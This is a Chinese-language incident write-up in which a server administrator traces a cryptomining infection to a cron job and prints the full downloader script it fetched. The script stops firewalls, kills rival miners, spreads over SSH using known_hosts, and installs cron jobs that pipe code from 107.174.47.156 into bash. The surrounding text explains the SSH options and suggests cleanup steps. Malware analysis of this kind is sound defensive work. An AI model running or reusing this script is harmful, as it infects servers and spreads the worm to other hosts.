解析一个挖矿病毒
服务器 cpu 异常
查看进程
将进程杀掉,文件删除,一会又起来了 sssus3 wc.conf
所以检查 定时任务
> cat /var/spool/cron/apache * * * * * wget -q -O - http://107.174.47.156/mr.sh | bash -sh > /dev/null 2>&1
果然有个定时任务
把定时任务清掉,一会又起来,于是把定时任务的脚本拉出来研究了一下(http://107.174.47.156/mr.sh)
#!/bin/sh mkdir /var/tmp chmod 777 /var/tmp/kworkerds echo -e "\n0.0.0.0 pastebin.com" >> /etc/hosts touch /etc/ld.so.preload # 解除锁定 chattr -i /usr/bin/wget chmod 755 /usr/bin/wget chattr -i /usr/bin/curl chmod 755 /usr/bin/curl # 关闭防火墙 /etc/init.d/iptables stop service iptables stop # suse 系统 SuSEfirewall2 stop reSuSEfirewall2 stop # 杀掉现有进程 pkill -f sysxlj pkill -f jourxlv pkill -f sustes # 清除socket连接进程 netstat -antp | grep '56415' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 netstat -antp | grep '139.99.120.75' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 ps aux|grep "I2NvZGluZzogdXRmLTg"|grep -v grep|awk '{print $2}'|xargs kill -9 # 旧文件处理 rm -rf /usr/lib/void.so rm -rf /etc/voidonce.sh rm -rf /usr/local/lib/libjdk.so rm -rf /usr/local/lib/libntp.so # 下载并传播病毒脚本 if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL http://107.174.47.156/mr.sh||wget -q -O- http://107.174.47.156/mr.sh)|bash -sh >/dev/null 2>&1 &' & done fi # 下载病毒脚本 for file in /home/* do if test -d $file then if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL http://107.174.47.156/mr.sh||wget -q -O- http://107.174.47.156/mr.sh)|bash -sh >/dev/null 2>&1 &' & done fi fi done sed -i '$d' /etc/crontab rm -rf /lib64/library1.so rm -rf /usr/lib64/library1.so # 解禁IP iptables -I OUTPUT -s 167.99.166.61 -j DROP iptables -I INPUT -s 167.99.166.61 -j DROP iptables -I OUTPUT -p tcp -m string --string "pastebin" --algo bm -j DROP iptables -I OUTPUT -p udp -m string --string "pastebin" --algo kmp -j DROP rm -rf /etc/cron.monthly/oanacroner rm -rf /etc/cron.daily/oanacroner rm -rf /etc/cron.hourly/oanacroner rm -rf /usr/local/bin/dns echo "" > /etc/crontab echo "" > /etc/cron.d/root echo "" > /etc/cron.d/apache echo "" > /var/spool/cron/root echo "" > /var/spool/cron/crontabs/root # 伪装程序1 chkconfig --del netdns pkill -f netdns echo "" > /etc/cron.d/system chmod 777 /var/tmp rm -rf /usr/local/bin/dns rm -rf /usr/sbin/netdns rm -rf /etc/init.d/netdns rm -rf /etc/cron.monthly/oanacroner rm -rf /etc/cron.daily/oanacroner rm -rf /etc/cron.hourly/oanacroner # 伪装程序2 chattr -i /usr/local/lib/libntpd.so chmod 777 /usr/local/lib/libntpd.so rm -rf /usr/local/lib/libntpd.so sed -i '/libntpd.so/d' /etc/ld.so.preload crontab -l | sed '/pastebin.com/d' | crontab - netstat -antp | grep '27.155.87.59\|51.38.133.232' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 netstat -antp | grep '27.155.87.59\|51.38.133.232' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13\|51.38.133.232' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13\|51.38.133.232' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13\|51.38.133.232' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 netstat -antp | grep '121.18.238.56\|51.38.133.232' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 netstat -antp | grep '121.18.238.56\|51.38.133.232' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 netstat -antp | grep '103.99.115.220\|51.38.133.232' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 netstat -antp | grep '103.99.115.220\|51.38.133.232' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 pkill -f /usr/bin/.sshd netstat -antp | grep '202.144.193.110:3333\|51.38.133.232' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 rm -rf /var/tmp/j* rm -rf /tmp/j* rm -rf /var/tmp/java rm -rf /tmp/java rm -rf /var/tmp/java2 rm -rf /tmp/java2 rm -rf /var/tmp/java* rm -rf /tmp/java* chattr -i /usr/lib/libiacpkmn.so.3 && rm -rf /usr/lib/libiacpkmn.so.3 chattr -i /etc/init.d/nfstruncate && rm -rf /etc/init.d/nfstruncate rm -rf /etc/rc.d/rc*.d/S01nfstruncate /bin/nfstruncate rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius rm -rf /tmp/*index_bak* rm -rf /tmp/*httpd.conf* rm -rf /tmp/*httpd.conf # 添加定时任务 echo -e "*/1 * * * * root (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh\n##" > /etc/cron.d/root echo -e "*/2 * * * * root (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh\n##" > /etc/cron.d/apache echo -e "*/30 * * * * (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh\n##" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo -e "* * * * * (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh\n##" > /var/spool/cron/crontabs/root mkdir -p /etc/cron.hourly (curl -fsSL --connect-timeout 120 http://107.174.47.156/11 -o /etc/cron.hourly/oanacroner1||http://107.174.47.156/11 -O /etc/cron.hourly/oanacroner1) && chmod 755 /etc/cron.hourly/oanacroner1 rm -rf /tmp/a7b104c270 rm -rf /tmp/.uninstall* /tmp/.python* /tmp/.tables* /tmp/.mas rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 chmod 777 /var/tmp/sustse # 检测CPU阈值 ps aux | grep -vw 'kworkerds\|sustse' | awk '{if($3>30.0) print $2}' | while read procid do kill -9 $procid done ps ax | grep /tmp/ | grep -v grep | grep -v 'kworkerds\|sustse\|kworkerds\|sustse\|ppl' | awk '{print $1}' | xargs kill -9 ps ax | grep 'wc.conf\|wq.conf\|wm.conf' | grep -v grep | grep -v 'kworkerds\|sustse\|kworkerds\|sustse\|ppl' | awk '{print $1}' | xargs kill -9 netstat -ant|grep '185.161.70.34:3333\|154.16.67.133:80\|205.185.122.99:3333'|grep 'ESTABLISHED'|grep -v grep if [ $? -eq 0 ] then pwd else curl -s http://107.174.47.156/2mr.sh | bash -sh || wget -q -O - http://107.174.47.156/2mr.sh | bash -sh fi sleep 2 # 检查定时任务 # -q 有匹配返回 0 if crontab -l | grep -q "107.174.47.156" then echo "Cron exists" else crontab -r echo "Cron not found" LDR="wget -q -O -" if [ -s /usr/bin/curl ]; then LDR="curl"; fi if [ -s /usr/bin/wget ]; then LDR="wget -q -O -"; fi (crontab -l 2>/dev/null; echo "* * * * * $LDR http://107.174.47.156/mr.sh | bash -sh > /dev/null 2>&1")| crontab - fi rm -rf /var/tmp/jrm rm -rf /tmp/jrm pkill -f 185.222.210.59 pkill -f 95.142.40.81 pkill -f 192.99.142.232 chmod 777 /var/tmp/sustse crontab -l | sed '/185.222.210.59/d' | crontab -
内容大家自己看吧 ,看完就知道该怎么操作了 : 把 authorized_keys 和 known_hosts 统统删掉
正则匹配
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts);
do
ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL http://107.174.47.156/mr.sh||wget -q -O- http://107.174.47.156/mr.sh)|bash -sh >/dev/null 2>&1 &' &
done
BatchMode:不显示交互窗口
ConnectTimeout:连接超时
StrictHostKeyChecking:取值 yes|no|ask ,有两种功能
1. 是否会自动地将远程主机的公钥记录到known_hosts中,
2. 二是当远程主机的公钥变化了,是否允许本地主机进行登录。
当StrictHostKeyChecking=no时,表示在连接远程主机时,会主动把对方的公钥加到known_hosts中,而不会提示用户是否要记录这样的信息,且当远程主机的公钥变化了,仍然会连接上,不会出现因为公钥不对连接失败